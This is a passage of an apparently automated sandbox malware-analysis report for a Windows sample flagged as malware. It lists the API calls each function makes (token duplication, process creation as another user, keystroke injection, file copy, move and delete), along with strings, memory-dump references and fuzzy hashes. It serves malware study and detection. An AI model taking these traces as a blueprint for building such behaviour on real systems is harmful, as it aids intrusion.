                                                                        APIs
                                                                        • Sleep.KERNELBASE(000001F4), ref: 03D98FF9
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2130234126.0000000003D96000.00000040.00000020.00020000.00000000.sdmp, Offset: 03D96000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3d96000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: Sleep
                                                                        • String ID:
                                                                        • API String ID: 3472027048-0
                                                                        • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                        • Instruction ID: ea5a7ea1d959a0d9dad2050be049944417286a08f8db1a13a339dda8db994655
                                                                        • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                        • Instruction Fuzzy Hash: D1E0BF7494010DEFDB10DFA8D5496DD7BB4EF04301F1005A5FD05D7690DB309E649A62
                                                                        APIs
                                                                        • Sleep.KERNELBASE(000001F4), ref: 03D98FF9
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2130234126.0000000003D96000.00000040.00000020.00020000.00000000.sdmp, Offset: 03D96000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3d96000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: Sleep
                                                                        • String ID:
                                                                        • API String ID: 3472027048-0
                                                                        • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                        • Instruction ID: cf9324ec9ad37df0bf502a3e424236a7bf484dd7fa4be90d0adf8972e9f795e4
                                                                        • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                        • Instruction Fuzzy Hash: 19E0E67494010DDFDB10DFB8D54969D7BF4EF04301F1001A5FD05D2280D7309D609A72
                                                                        APIs
                                                                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C8E1
                                                                        • DefDlgProcW.USER32(?,0000004E,?,?), ref: 0047C8FC
                                                                        • GetKeyState.USER32(00000011), ref: 0047C92D
                                                                        • GetKeyState.USER32(00000009), ref: 0047C936
                                                                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C949
                                                                        • GetKeyState.USER32(00000010), ref: 0047C953
                                                                        • GetWindowLongW.USER32(00000002,000000F0), ref: 0047C967
                                                                        • SendMessageW.USER32(00000002,0000110A,00000009,00000000), ref: 0047C993
                                                                        • SendMessageW.USER32(00000002,0000113E,00000000,?), ref: 0047C9B6
                                                                        • _wcsncpy.LIBCMT ref: 0047CA29
                                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0047CA5A
                                                                        • SendMessageW.USER32 ref: 0047CA7F
                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 0047CADF
                                                                        • SendMessageW.USER32(?,00001030,?,0047EA68), ref: 0047CB84
                                                                        • ImageList_SetDragCursorImage.COMCTL32(00A6FF90,00000000,00000000,00000000), ref: 0047CB9B
                                                                        • ImageList_BeginDrag.COMCTL32(00A6FF90,00000000,000000F8,000000F0), ref: 0047CBAC
                                                                        • SetCapture.USER32(?), ref: 0047CBB6
                                                                        • ClientToScreen.USER32(?,?), ref: 0047CC17
                                                                        • ImageList_DragEnter.COMCTL32(00000000,?,?,?,?), ref: 0047CC26
                                                                        • ReleaseCapture.USER32 ref: 0047CC3A
                                                                        • GetCursorPos.USER32(?), ref: 0047CC72
                                                                        • ScreenToClient.USER32(?,?), ref: 0047CC80
                                                                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CCE6
                                                                        • SendMessageW.USER32 ref: 0047CD12
                                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CD53
                                                                        • SendMessageW.USER32 ref: 0047CD80
                                                                        • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0047CD99
                                                                        • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0047CDAA
                                                                        • GetCursorPos.USER32(?), ref: 0047CDC8
                                                                        • ScreenToClient.USER32(?,?), ref: 0047CDD6
                                                                        • GetParent.USER32(00000000), ref: 0047CDF7
                                                                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CE60
                                                                        • SendMessageW.USER32 ref: 0047CE93
                                                                        • ClientToScreen.USER32(?,?), ref: 0047CEEE
                                                                        • TrackPopupMenuEx.USER32(?,00000000,?,?,00981C48,00000000,?,?,?,?), ref: 0047CF1C
                                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CF46
                                                                        • SendMessageW.USER32 ref: 0047CF6B
                                                                        • ClientToScreen.USER32(?,?), ref: 0047CFB5
                                                                        • TrackPopupMenuEx.USER32(?,00000080,?,?,00981C48,00000000,?,?,?,?), ref: 0047CFE6
                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 0047D086
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$ClientScreen$Image$CursorDragList_State$CaptureLongMenuPopupTrackWindow$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                        • String ID: @GUI_DRAGID$F
                                                                        • API String ID: 3100379633-4164748364
                                                                        • Opcode ID: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
                                                                        • Instruction ID: 980357f173c9be8e312ccaa606797ee7157b6525bda81ee0817efdfc4c954517
                                                                        • Opcode Fuzzy Hash: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
                                                                        • Instruction Fuzzy Hash: F842AD706043419FD714DF28C884FABB7A5FF89700F14865EFA489B291C7B8E846CB5A
                                                                        APIs
                                                                        • GetForegroundWindow.USER32 ref: 00434420
                                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00434446
                                                                        • IsIconic.USER32(?), ref: 0043444F
                                                                        • ShowWindow.USER32(?,00000009), ref: 0043445C
                                                                        • SetForegroundWindow.USER32(?), ref: 0043446A
                                                                        • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434481
                                                                        • GetCurrentThreadId.KERNEL32 ref: 00434485
                                                                        • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434493
                                                                        • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A2
                                                                        • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A8
                                                                        • AttachThreadInput.USER32(00000000,?,00000001), ref: 004344B1
                                                                        • SetForegroundWindow.USER32(00000000), ref: 004344B7
                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344C6
                                                                        • keybd_event.USER32(00000012,00000000), ref: 004344CF
                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344DD
                                                                        • keybd_event.USER32(00000012,00000000), ref: 004344E6
                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344F4
                                                                        • keybd_event.USER32(00000012,00000000), ref: 004344FD
                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043450B
                                                                        • keybd_event.USER32(00000012,00000000), ref: 00434514
                                                                        • SetForegroundWindow.USER32(00000000), ref: 0043451E
                                                                        • AttachThreadInput.USER32(00000000,?,00000000), ref: 0043453F
                                                                        • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434545
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: ThreadWindow$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                        • String ID: Shell_TrayWnd
                                                                        • API String ID: 2889586943-2988720461
                                                                        • Opcode ID: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
                                                                        • Instruction ID: 0b42b206f44700a00bd4aa1610e9651ae8f7722fee000eb3c659fd44b6abead8
                                                                        • Opcode Fuzzy Hash: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
                                                                        • Instruction Fuzzy Hash: AD416272640218BFE7205BA4DE4AFBE7B6CDB58B11F10442EFA01EA1D0D6F458419BA9
                                                                        APIs
                                                                        • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 0044638E
                                                                        • CloseHandle.KERNEL32(?), ref: 004463A0
                                                                        • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004463B8
                                                                        • GetProcessWindowStation.USER32 ref: 004463D1
                                                                        • SetProcessWindowStation.USER32(00000000), ref: 004463DB
                                                                        • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 004463F7
                                                                        • _wcslen.LIBCMT ref: 00446498
                                                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                        • _wcsncpy.LIBCMT ref: 004464C0
                                                                        • LoadUserProfileW.USERENV(?,00000020), ref: 004464D9
                                                                        • CreateEnvironmentBlock.USERENV(?,?,00000000), ref: 004464F3
                                                                        • CreateProcessAsUserW.ADVAPI32(?,00000000,00000000,00000000,00000000,?,?,?,?,000F01FF,00000400), ref: 00446522
                                                                        • UnloadUserProfile.USERENV(?,?), ref: 00446555
                                                                        • CloseWindowStation.USER32(00000000), ref: 0044656C
                                                                        • CloseDesktop.USER32(?), ref: 0044657A
                                                                        • SetProcessWindowStation.USER32(?), ref: 00446588
                                                                        • CloseHandle.KERNEL32(?), ref: 00446592
                                                                        • DestroyEnvironmentBlock.USERENV(?), ref: 004465A9
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: StationWindow$CloseProcess$User$BlockCreateDesktopEnvironmentHandleOpenProfile$DestroyDuplicateLoadTokenUnload_malloc_wcslen_wcsncpy
                                                                        • String ID: $@OH$default$winsta0
                                                                        • API String ID: 3324942560-3791954436
                                                                        • Opcode ID: 17ea6258488d9c46c7a00dd8b46b11f65bca9c9d467b249e48c4e72528dedec9
                                                                        • Instruction ID: a255b9755a473e3b45922b0ee48cea4cb67e1360e8ecd59b8ab49ad27cdc7b44
                                                                        • Opcode Fuzzy Hash: 17ea6258488d9c46c7a00dd8b46b11f65bca9c9d467b249e48c4e72528dedec9
                                                                        • Instruction Fuzzy Hash: A28180B0A00209ABEF10CFA5DD4AFAF77B8AF49704F05455EF914A7284D778D901CB69
                                                                        APIs
                                                                          • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exe,0040F545,C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exe,004A90E8,C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exe,?,0040F545), ref: 0041013C
                                                                          • Part of subcall function 00433908: __wsplitpath.LIBCMT ref: 0043392E
                                                                          • Part of subcall function 00433908: __wsplitpath.LIBCMT ref: 00433950
                                                                          • Part of subcall function 00433908: __wcsicoll.LIBCMT ref: 00433974
                                                                          • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                                        • _wcscat.LIBCMT ref: 0044BD94
                                                                        • _wcscat.LIBCMT ref: 0044BDBD
                                                                        • __wsplitpath.LIBCMT ref: 0044BDEA
                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 0044BE02
                                                                        • _wcscpy.LIBCMT ref: 0044BE71
                                                                        • _wcscat.LIBCMT ref: 0044BE83
                                                                        • _wcscat.LIBCMT ref: 0044BE95
                                                                        • lstrcmpiW.KERNEL32(?,?), ref: 0044BEC1
                                                                        • DeleteFileW.KERNEL32(?), ref: 0044BED3
                                                                        • MoveFileW.KERNEL32(?,?), ref: 0044BEF3
                                                                        • CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF0A
                                                                        • DeleteFileW.KERNEL32(?), ref: 0044BF15
                                                                        • CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF2C
                                                                        • FindClose.KERNEL32(00000000), ref: 0044BF33
                                                                        • MoveFileW.KERNEL32(?,?), ref: 0044BF4F
                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 0044BF64
                                                                        • FindClose.KERNEL32(00000000), ref: 0044BF7C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: File$Find_wcscat$__wsplitpath$CloseCopyDeleteMove$AttributesFirstFullNameNextPath__wcsicoll_wcscpylstrcmpi
                                                                        • String ID: \*.*
                                                                        • API String ID: 2188072990-1173974218
                                                                        • Opcode ID: c24caf0b266a53f5e7acd00b30f5ede1e5d756040c77aa0fe23e7167681731b8
                                                                        • Instruction ID: 72a2fd59153234373391f972af8bc7e503bf673df65afccb4f4ecee040a4f935
                                                                        • Opcode Fuzzy Hash: c24caf0b266a53f5e7acd00b30f5ede1e5d756040c77aa0fe23e7167681731b8
                                                                        • Instruction Fuzzy Hash: E25167B2408384AAD734DB50DC45EDF73E9AFC8304F544E1EF68982141EB75D249CBA6
                                                                        APIs
                                                                        • FindFirstFileW.KERNEL32(00000000,?,?), ref: 004788E4
                                                                        • FindClose.KERNEL32(00000000), ref: 00478924
                                                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478949
                                                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478961
                                                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 00478989
                                                                        • __swprintf.LIBCMT ref: 004789D3
                                                                        • __swprintf.LIBCMT ref: 00478A1D
                                                                        • __swprintf.LIBCMT ref: 00478A4B
                                                                        • __swprintf.LIBCMT ref: 00478A79
                                                                          • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 00413314
                                                                          • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 0041332C
                                                                        • __swprintf.LIBCMT ref: 00478AA7
                                                                        • __swprintf.LIBCMT ref: 00478AD5
                                                                        • __swprintf.LIBCMT ref: 00478B03
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem
                                                                        • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                        • API String ID: 999945258-2428617273
                                                                        • Opcode ID: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
                                                                        • Instruction ID: 8fd0730747e081185947bc4026d2fd3d0a29cbe563c255e8678d3cf3417a7967
                                                                        • Opcode Fuzzy Hash: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
                                                                        • Instruction Fuzzy Hash: 32719772204300ABC310EF55CC85FAFB7E9AF88705F504D2FF645962D1E6B9E944875A
                                                                        APIs
                                                                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                        • GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                                                                        • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                                                                        • __wsplitpath.LIBCMT ref: 00403492
                                                                          • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                                        • _wcscpy.LIBCMT ref: 004034A7
                                                                        • _wcscat.LIBCMT ref: 004034BC
                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                                                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                          • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                          • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                          • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                          • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,?,0040355C,?,?,?,00000010), ref: 00403B08
                                                                          • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,00000010), ref: 00403B41
                                                                        • _wcscpy.LIBCMT ref: 004035A0
                                                                        • _wcslen.LIBCMT ref: 00403623
                                                                        • _wcslen.LIBCMT ref: 0040367D
                                                                        Strings
                                                                        • #include depth exceeded. Make sure there are no recursive includes, xrefs: 00428200
                                                                        • _, xrefs: 0040371C
                                                                        • Unterminated string, xrefs: 00428348
                                                                        • Error opening the file, xrefs: 00428231
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: _wcslen$ByteCharCurrentDirectoryMultiWide_wcscpystd::exception::exception$Exception@8FullNamePathThrow__wsplitpath__wsplitpath_helper_malloc_memmove_wcscat
                                                                        • String ID: #include depth exceeded. Make sure there are no recursive includes$Error opening the file$Unterminated string$_
                                                                        • API String ID: 3393021363-188983378
                                                                        • Opcode ID: d7567003ac82893a05918a50732f98c0da489d2a1a1b1371126f827adaf0f001
                                                                        • Instruction ID: 51a390cb75b153cc6cab8b26b712b327f6f81406d0e69f910df9a3585dc9283e
                                                                        • Opcode Fuzzy Hash: d7567003ac82893a05918a50732f98c0da489d2a1a1b1371126f827adaf0f001
                                                                        • Instruction Fuzzy Hash: CCD105B1508341AAD710EF64D841AEFBBE8AF85304F404C2FF98553291DB79DA49C7AB
                                                                        APIs
                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00431AAA
                                                                        • GetFileAttributesW.KERNEL32(?), ref: 00431AE7
                                                                        • SetFileAttributesW.KERNEL32(?,?), ref: 00431AFD
                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 00431B0F
                                                                        • FindClose.KERNEL32(00000000), ref: 00431B20
                                                                        • FindClose.KERNEL32(00000000), ref: 00431B34
                                                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 00431B4F
                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00431B96
                                                                        • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 00431BBA
                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00431BC2
                                                                        • FindClose.KERNEL32(00000000), ref: 00431BCD
                                                                        • FindClose.KERNEL32(00000000), ref: 00431BDB
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                        • String ID: *.*
                                                                        • API String ID: 1409584000-438819550
                                                                        • Opcode ID: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
                                                                        • Instruction ID: b696eadadcb8a1627fc7fa6feda0e6e57aab690e04623b9265854ab7309d24dd
                                                                        • Opcode Fuzzy Hash: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
                                                                        • Instruction Fuzzy Hash: CE41D8726002046BC700EF65DC45EAFB3ACAE89311F04592FF954C3190E7B8E519C7A9
                                                                        APIs
                                                                        • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00431C09
                                                                        • __swprintf.LIBCMT ref: 00431C2E
                                                                        • _wcslen.LIBCMT ref: 00431C3A
                                                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 00431C67
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: CreateDirectoryFullNamePath__swprintf_wcslen
                                                                        • String ID: :$\$\??\%s
                                                                        • API String ID: 2192556992-3457252023
                                                                        • Opcode ID: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
                                                                        • Instruction ID: 5b8928ca783b893dacbf0721098a8616f59dd17613a34138e213b27d6ec4c177
                                                                        • Opcode Fuzzy Hash: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
                                                                        • Instruction Fuzzy Hash: EE413E726403186BD720DB54DC45FDFB3BCFF58710F00859AFA0896191EBB49A548BD8
                                                                        APIs
                                                                        • GetLocalTime.KERNEL32(?), ref: 004722A2
                                                                        • __swprintf.LIBCMT ref: 004722B9
                                                                        • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,0048BF68), ref: 004724EC
                                                                        • SHGetFolderPathW.SHELL32(00000000,0000002B,00000000,00000000,0048BF68), ref: 00472506
                                                                        • SHGetFolderPathW.SHELL32(00000000,00000005,00000000,00000000,0048BF68), ref: 00472520
                                                                        • SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,0048BF68), ref: 0047253A
                                                                        • SHGetFolderPathW.SHELL32(00000000,00000019,00000000,00000000,0048BF68), ref: 00472554
                                                                        • SHGetFolderPathW.SHELL32(00000000,0000002E,00000000,00000000,0048BF68), ref: 0047256E
                                                                        • SHGetFolderPathW.SHELL32(00000000,0000001F,00000000,00000000,0048BF68), ref: 00472588
                                                                        • SHGetFolderPathW.SHELL32(00000000,00000017,00000000,00000000,0048BF68), ref: 004725A2
                                                                        • SHGetFolderPathW.SHELL32(00000000,00000016,00000000,00000000,0048BF68), ref: 004725BC
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
